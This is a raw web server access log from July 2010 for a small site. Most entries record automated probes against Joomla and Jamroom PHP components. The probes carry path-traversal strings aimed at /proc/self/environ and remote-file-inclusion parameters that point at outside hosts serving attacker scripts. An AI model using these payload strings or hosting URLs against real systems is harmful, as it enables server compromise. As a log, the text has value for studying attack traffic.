92.43.201.28 - - [27/Jul/2010:02:26:16 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:26:16 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:02:26:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:02:26:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:02:26:54 -0700] "GET /logs/access_100712.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [27/Jul/2010:02:27:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:27:38 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:27:39 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:02:31:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:33:44 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:33:44 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:34:53 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:35:33 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:35:33 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:35:40 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [27/Jul/2010:02:35:40 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:43:58 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:43:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:43:58 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:44:04 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:44:04 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:44:04 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:44:39 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:44:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:44:39 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:49:32 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:49:33 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:49:33 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:49:38 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:49:39 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:49:39 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:50:02 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:51:51 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:51:57 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:52:03 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:56:21 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:56:27 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:56:32 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.241.251.207 - - [27/Jul/2010:02:58:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:03:02:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.182.124.219 - - [27/Jul/2010:03:05:23 -0700] "GET /blog/ HTTP/1.1" 404 - "http://find1friend.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.redneckmba.com"
92.241.190.214 - - [27/Jul/2010:03:13:08 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
92.241.190.214 - - [27/Jul/2010:03:13:56 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.206 - - [27/Jul/2010:03:14:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [27/Jul/2010:03:24:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.186.81.78 - - [27/Jul/2010:03:25:46 -0700] "GET /logs/access.log//index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.186.81.78 - - [27/Jul/2010:03:25:46 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.186.81.78 - - [27/Jul/2010:03:25:46 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.241.251.207 - - [27/Jul/2010:03:26:18 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.241.251.207 - - [27/Jul/2010:03:26:19 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.241.251.207 - - [27/Jul/2010:03:26:20 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:03:36:01 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.64.68.228 - - [27/Jul/2010:03:48:52 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:03:49:57 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:50:30 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:50:30 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:55:11 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:55:32 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:55:32 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:55:32 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:56:47 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:56:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:03:56:48 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:03:58:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.46.199.199 - - [27/Jul/2010:03:58:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
212.13.195.84 - - [27/Jul/2010:03:58:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
212.13.195.84 - - [27/Jul/2010:04:11:45 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
212.13.195.84 - - [27/Jul/2010:04:11:45 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
212.13.195.84 - - [27/Jul/2010:04:11:45 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:04:12:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
193.138.125.55 - - [27/Jul/2010:04:15:24 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:04:15:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:04:15:25 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:41 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:41 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:41 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:42 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:42 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:42 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:42 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:42 -0700] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:42 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:44 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:44 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:23:44 -0700] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:24:44 -0700] "GET /logs/access_100614.log//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:24:53 -0700] "GET /logs/access_100614.log//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:04:25:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:25:37 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:25:37 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:25:37 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:25:44 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:25:44 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:25:44 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:26:57 -0700] "GET /logs/access_100614.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:27:06 -0700] "GET /logs/access_100614.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:28:02 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.86.178 - - [27/Jul/2010:04:28:02 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:04:39:25 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:04:39:36 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://postarticle.ir/articles/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.205 - - [27/Jul/2010:04:44:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.70.7.48 - - [27/Jul/2010:04:48:18 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.105 - - [27/Jul/2010:04:49:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:14 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:14 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:14 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:14 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:14 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:14 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:45 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:45 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:45 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:47 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:47 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:47 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:49 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:49 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
